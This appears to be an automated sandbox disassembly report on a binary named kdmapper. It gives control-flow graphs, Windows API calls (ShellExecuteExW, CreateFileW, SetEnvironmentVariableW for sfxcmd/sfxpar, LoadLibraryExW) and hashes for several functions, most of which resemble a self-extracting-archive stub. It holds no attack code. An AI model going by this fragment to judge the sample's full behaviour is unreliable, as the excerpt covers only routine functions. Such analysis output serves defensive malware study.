                                                                                                                                                                                                              • Instruction ID: e9c406cad7029f389f34a82bb9cd8dda02bd6b385547fbe7a3f891a87f8720ee
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5b3aaaff4ccf8ed217dc3309e5daaf7c646df22089385a281a7f7653a6ea00d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77310475145346BFE311DF31DC0AFAB7FADEB83708F000608F651A6290DBA48A0A8776

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 836 dfd78f-dfd7a7 call dfec50 839 dfd7ad-dfd7b9 call e03e13 836->839 840 dfd9e8-dfd9f0 836->840 839->840 843 dfd7bf-dfd7e7 call dffff0 839->843 846 dfd7e9 843->846 847 dfd7f1-dfd7ff 843->847 846->847 848 dfd812-dfd818 847->848 849 dfd801-dfd804 847->849 851 dfd85b-dfd85e 848->851 850 dfd808-dfd80e 849->850 853 dfd837-dfd844 850->853 854 dfd810 850->854 851->850 852 dfd860-dfd866 851->852 855 dfd86d-dfd86f 852->855 856 dfd868-dfd86b 852->856 858 dfd84a-dfd84e 853->858 859 dfd9c0-dfd9c2 853->859 857 dfd822-dfd82c 854->857 860 dfd882-dfd898 call deb92d 855->860 861 dfd871-dfd878 855->861 856->855 856->860 862 dfd82e 857->862 863 dfd81a-dfd820 857->863 864 dfd9c6 858->864 865 dfd854-dfd859 858->865 859->864 872 dfd89a-dfd8a7 call df1fbb 860->872 873 dfd8b1-dfd8bc call dea231 860->873 861->860 866 dfd87a 861->866 862->853 863->857 868 dfd830-dfd833 863->868 869 dfd9cf 864->869 865->851 866->860 868->853 871 dfd9d6-dfd9d8 869->871 874 dfd9da-dfd9dc 871->874 875 dfd9e7 871->875 872->873 883 dfd8a9 872->883 881 dfd8be-dfd8d5 call deb6c4 873->881 882 dfd8d9-dfd8e6 ShellExecuteExW 873->882 874->875 878 dfd9de-dfd9e1 ShowWindow 874->878 875->840 878->875 881->882 882->875 885 dfd8ec-dfd8f9 882->885 883->873 887 dfd90c-dfd90e 885->887 888 dfd8fb-dfd902 885->888 890 dfd925-dfd944 call dfdc3b 887->890 891 dfd910-dfd919 887->891 888->887 889 dfd904-dfd90a 888->889 889->887 892 dfd97b-dfd987 CloseHandle 889->892 890->892 904 dfd946-dfd94e 890->904 891->890 899 dfd91b-dfd923 ShowWindow 891->899 893 dfd989-dfd996 call df1fbb 892->893 894 dfd998-dfd9a6 892->894 893->869 893->894 894->871 898 dfd9a8-dfd9aa 894->898 898->871 903 dfd9ac-dfd9b2 898->903 899->890 903->871 905 dfd9b4-dfd9be 903->905 904->892 906 dfd950-dfd961 GetExitCodeProcess 904->906 905->871 906->892 907 dfd963-dfd96d 906->907 908 dfd96f 907->908 909 dfd974 907->909 908->909 909->892
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DFD7AE
                                                                                                                                                                                                              • ShellExecuteExW.SHELL32(?), ref: 00DFD8DE
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00DFD91D
                                                                                                                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00DFD959
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00DFD97F
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000001), ref: 00DFD9E1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                                                                                                                              • String ID: .exe$.inf
                                                                                                                                                                                                              • API String ID: 36480843-3750412487
                                                                                                                                                                                                              • Opcode ID: b93c259c5cb70fa3283a61913a0463f4dee52abcaeabd04c5268ab41023ecb2a
                                                                                                                                                                                                              • Instruction ID: a07a8899bc1826f9894ef3374f3e282cafce4097174dd7e5548f0d27ab88c4ed
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b93c259c5cb70fa3283a61913a0463f4dee52abcaeabd04c5268ab41023ecb2a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3351F5714043889EDB309F65D8447BBBBE7AF81744F0A841EFAC4A7191D7B18989CB72

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 910 e0a95b-e0a974 911 e0a976-e0a986 call e0ef4c 910->911 912 e0a98a-e0a98f 910->912 911->912 919 e0a988 911->919 913 e0a991-e0a999 912->913 914 e0a99c-e0a9c0 MultiByteToWideChar 912->914 913->914 917 e0ab53-e0ab66 call dffbbc 914->917 918 e0a9c6-e0a9d2 914->918 920 e0a9d4-e0a9e5 918->920 921 e0aa26 918->921 919->912 924 e0aa04-e0aa15 call e08e06 920->924 925 e0a9e7-e0a9f6 call e12010 920->925 923 e0aa28-e0aa2a 921->923 927 e0aa30-e0aa43 MultiByteToWideChar 923->927 928 e0ab48 923->928 924->928 938 e0aa1b 924->938 925->928 937 e0a9fc-e0aa02 925->937 927->928 931 e0aa49-e0aa5b call e0af6c 927->931 932 e0ab4a-e0ab51 call e0abc3 928->932 939 e0aa60-e0aa64 931->939 932->917 941 e0aa21-e0aa24 937->941 938->941 939->928 942 e0aa6a-e0aa71 939->942 941->923 943 e0aa73-e0aa78 942->943 944 e0aaab-e0aab7 942->944 943->932 945 e0aa7e-e0aa80 943->945 946 e0ab03 944->946 947 e0aab9-e0aaca 944->947 945->928 948 e0aa86-e0aaa0 call e0af6c 945->948 949 e0ab05-e0ab07 946->949 950 e0aae5-e0aaf6 call e08e06 947->950 951 e0aacc-e0aadb call e12010 947->951 948->932 965 e0aaa6 948->965 955 e0ab41-e0ab47 call e0abc3 949->955 956 e0ab09-e0ab22 call e0af6c 949->956 950->955 964 e0aaf8 950->964 951->955 962 e0aadd-e0aae3 951->962 955->928 956->955 968 e0ab24-e0ab2b 956->968 967 e0aafe-e0ab01 962->967 964->967 965->928 967->949 969 e0ab67-e0ab6d 968->969 970 e0ab2d-e0ab2e 968->970 971 e0ab2f-e0ab3f WideCharToMultiByte 969->971 970->971 971->955 972 e0ab6f-e0ab76 call e0abc3 971->972 972->932
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00E05695,00E05695,?,?,?,00E0ABAC,00000001,00000001,2DE85006), ref: 00E0A9B5
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00E0ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00E0AA3B
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00E0AB35
                                                                                                                                                                                                              • __freea.LIBCMT ref: 00E0AB42
                                                                                                                                                                                                                • Part of subcall function 00E08E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E0CA2C,00000000,?,00E06CBE,?,00000008,?,00E091E0,?,?,?), ref: 00E08E38
                                                                                                                                                                                                              • __freea.LIBCMT ref: 00E0AB4B
                                                                                                                                                                                                              • __freea.LIBCMT ref: 00E0AB70
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1414292761-0
                                                                                                                                                                                                              • Opcode ID: 39e0d3ecaf81b42f05058ec68855f5a2b084b25af6b9fad4175ea024d53dfaf8
                                                                                                                                                                                                              • Instruction ID: 6166572de8085323cbfab969783c20a912fc25e7a5ca57c8b94a5c6ca97a8286
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39e0d3ecaf81b42f05058ec68855f5a2b084b25af6b9fad4175ea024d53dfaf8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3151A17261031AAFDB258E64CC41EBBB7AAEB44754B195639FD04F61C0DB34DCD0CA91

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 975 e03b72-e03b7c 976 e03bee-e03bf1 975->976 977 e03bf3 976->977 978 e03b7e-e03b8c 976->978 979 e03bf5-e03bf9 977->979 980 e03b95-e03bb1 LoadLibraryExW 978->980 981 e03b8e-e03b91 978->981 982 e03bb3-e03bbc GetLastError 980->982 983 e03bfa-e03c00 980->983 984 e03b93 981->984 985 e03c09-e03c0b 981->985 986 e03be6-e03be9 982->986 987 e03bbe-e03bd3 call e06088 982->987 983->985 988 e03c02-e03c03 FreeLibrary 983->988 989 e03beb 984->989 985->979 986->989 987->986 992 e03bd5-e03be4 LoadLibraryExW 987->992 988->985 989->976 992->983 992->986
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00E03C35,?,?,00E42088,00000000,?,00E03D60,00000004,InitializeCriticalSectionEx,00E16394,InitializeCriticalSectionEx,00000000), ref: 00E03C03
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                              • API String ID: 3664257935-2084034818
                                                                                                                                                                                                              • Opcode ID: 4e57c5885e076a5b0585981ebe686c5e7f6451eb1607d1a384f0cbfb32ebb908
                                                                                                                                                                                                              • Instruction ID: 1ecb88e3467036efec18f7854c249664907bc09e7a1d1e00e7d23ac46233cb07
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e57c5885e076a5b0585981ebe686c5e7f6451eb1607d1a384f0cbfb32ebb908
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2211E335A45220AFCB328B799C41B9D77A89F01778F211111E915FB2D0E770EF848AD0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 993 de98e0-de9901 call dfec50 996 de990c 993->996 997 de9903-de9906 993->997 999 de990e-de991f 996->999 997->996 998 de9908-de990a 997->998 998->999 1000 de9927-de9931 999->1000 1001 de9921 999->1001 1002 de9936-de9943 call de6edb 1000->1002 1003 de9933 1000->1003 1001->1000 1006 de994b-de996a CreateFileW 1002->1006 1007 de9945 1002->1007 1003->1002 1008 de996c-de998e GetLastError call debb03 1006->1008 1009 de99bb-de99bf 1006->1009 1007->1006 1013 de99c8-de99cd 1008->1013 1015 de9990-de99b3 CreateFileW GetLastError 1008->1015 1011 de99c3-de99c6 1009->1011 1011->1013 1014 de99d9-de99de 1011->1014 1013->1014 1016 de99cf 1013->1016 1017 de99ff-de9a10 1014->1017 1018 de99e0-de99e3 1014->1018 1015->1011 1021 de99b5-de99b9 1015->1021 1016->1014 1019 de9a2e-de9a39 1017->1019 1020 de9a12-de9a2a call df0602 1017->1020 1018->1017 1022 de99e5-de99f9 SetFileTime 1018->1022 1020->1019 1021->1011 1022->1017
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00DE7760,?,00000005,?,00000011), ref: 00DE995F
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00DE7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00DE996C
                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00DE7760,?,00000005,?), ref: 00DE99A2
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00DE7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00DE99AA
                                                                                                                                                                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00DE7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00DE99F9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CreateErrorLast$Time
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1999340476-0
                                                                                                                                                                                                              • Opcode ID: 5d8e8fbde5b8f9fce91a704d69983e7375528f88081f064e85c77e0419f9a838
                                                                                                                                                                                                              • Instruction ID: b5faa430df199448088d46f456de34db9af0619b2350241bf5eee5f77655acb0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d8e8fbde5b8f9fce91a704d69983e7375528f88081f064e85c77e0419f9a838
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B13113305453856FE730AF26CC46BEAFBD4BB04320F141B19F9A1961D2D3A4A988CFB1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1052 dfabab-dfabca GetClassNameW 1053 dfabcc-dfabe1 call df1fbb 1052->1053 1054 dfabf2-dfabf4 1052->1054 1059 dfabe3-dfabef FindWindowExW 1053->1059 1060 dfabf1 1053->1060 1055 dfabff-dfac01 1054->1055 1056 dfabf6-dfabf9 SHAutoComplete 1054->1056 1056->1055 1059->1060 1060->1054
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000050), ref: 00DFABC2
                                                                                                                                                                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00DFABF9
                                                                                                                                                                                                                • Part of subcall function 00DF1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00DEC116,00000000,.exe,?,?,00000800,?,?,?,00DF8E3C), ref: 00DF1FD1
                                                                                                                                                                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00DFABE9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                                                                                              • String ID: EDIT
                                                                                                                                                                                                              • API String ID: 4243998846-3080729518
                                                                                                                                                                                                              • Opcode ID: b47aca23fa7f529084335535ad285f88fb95a502034bcfa1020a7088af5605d8
                                                                                                                                                                                                              • Instruction ID: a4b56a49b7f1cdc650390fc1b3f6d9c37d2473f62cb7980feb258b74fd4090a1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b47aca23fa7f529084335535ad285f88fb95a502034bcfa1020a7088af5605d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22F0827660022D7ADB3096699C0AFEB776C9F46B41F4E8112BB09B21C0D760DA46C5B6

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00DF081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00DF0836
                                                                                                                                                                                                                • Part of subcall function 00DF081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00DEF2D8,Crypt32.dll,00000000,00DEF35C,?,?,00DEF33E,?,?,?), ref: 00DF0858
                                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00DFAC2F
                                                                                                                                                                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00DFAC66
                                                                                                                                                                                                              • SHGetMalloc.SHELL32(00E28438), ref: 00DFAC70
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                                                                                                              • String ID: riched20.dll
                                                                                                                                                                                                              • API String ID: 3498096277-3360196438
                                                                                                                                                                                                              • Opcode ID: ca3d7288377b5cb58d6efc8b4a6981a06886c3a3ff0a948f0718cb0737dc73e8
                                                                                                                                                                                                              • Instruction ID: 5395c4371c61b36d8740b72c149b5f4d03726217f58d59a7ce58fff57b688235
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca3d7288377b5cb58d6efc8b4a6981a06886c3a3ff0a948f0718cb0737dc73e8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9F049B5D00209AFCB10AFAAD8499EFFFFCEF85700F10411AA811B2241CBB456068BA1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1065 dfdbde-dfdc09 call dfec50 SetEnvironmentVariableW call df0371 1069 dfdc0e-dfdc12 1065->1069 1070 dfdc36-dfdc38 1069->1070 1071 dfdc14-dfdc18 1069->1071 1072 dfdc21-dfdc28 call df048d 1071->1072 1075 dfdc1a-dfdc20 1072->1075 1076 dfdc2a-dfdc30 SetEnvironmentVariableW 1072->1076 1075->1072 1076->1070
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00DFDBF4
                                                                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00DFDC30
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EnvironmentVariable
                                                                                                                                                                                                              • String ID: sfxcmd$sfxpar
                                                                                                                                                                                                              • API String ID: 1431749950-3493335439
                                                                                                                                                                                                              • Opcode ID: c20ae2201e3a1e0672e37c54a9d704840743f7dfa91ac82a12bc25f53aaf7e56
                                                                                                                                                                                                              • Instruction ID: 26c1efb39199fae82bb4b342c4a71aaa5b6a63073f84146614203ab689657303
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c20ae2201e3a1e0672e37c54a9d704840743f7dfa91ac82a12bc25f53aaf7e56
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9DF0ECB350532CBBDB211F959C06BFA3B9AEF08B81B058411FF85A6052D6F08980D6B0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1077 de9785-de9791 1078 de979e-de97b5 ReadFile 1077->1078 1079 de9793-de979b GetStdHandle 1077->1079 1080 de97b7-de97c0 call de98bc 1078->1080 1081 de9811 1078->1081 1079->1078 1085 de97d9-de97dd 1080->1085 1086 de97c2-de97ca 1080->1086 1083 de9814-de9817 1081->1083 1088 de97ee-de97f2 1085->1088 1089 de97df-de97e8 GetLastError 1085->1089 1086->1085 1087 de97cc 1086->1087 1092 de97cd-de97d7 call de9785 1087->1092 1090 de980c-de980f 1088->1090 1091 de97f4-de97fc 1088->1091 1089->1088 1093 de97ea-de97ec 1089->1093 1090->1083 1091->1090 1094 de97fe-de9807 GetLastError 1091->1094 1092->1083 1093->1083 1094->1090 1096 de9809-de980a 1094->1096 1096->1092
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00DE9795
                                                                                                                                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00DE97AD
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00DE97DF
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00DE97FE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2244327787-0
                                                                                                                                                                                                              • Opcode ID: 7639ec737557fc8c77ea519868d9ccc75bc77c5eaa6911638122014a52862e0f
                                                                                                                                                                                                              • Instruction ID: d3a750da6a18d918a799e8a0d2f98d684e3a56c7afad4c85002c302b8d00b631
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7639ec737557fc8c77ea519868d9ccc75bc77c5eaa6911638122014a52862e0f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F11CE30912244EBDF20BF37C854AAEBBA9FF06360F148929F456952A0D770CE48DB71

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1098 e0ad34-e0ad48 1099 e0ad55-e0ad70 LoadLibraryExW 1098->1099 1100 e0ad4a-e0ad53 1098->1100 1102 e0ad72-e0ad7b GetLastError 1099->1102 1103 e0ad99-e0ad9f 1099->1103 1101 e0adac-e0adae 1100->1101 1106 e0ad8a 1102->1106 1107 e0ad7d-e0ad88 LoadLibraryExW 1102->1107 1104 e0ada1-e0ada2 FreeLibrary 1103->1104 1105 e0ada8 1103->1105 1104->1105 1108 e0adaa-e0adab 1105->1108 1109 e0ad8c-e0ad8e 1106->1109 1107->1109 1108->1101 1109->1103 1110 e0ad90-e0ad97 1109->1110 1110->1108
                                                                                                                                                                                                              APIs
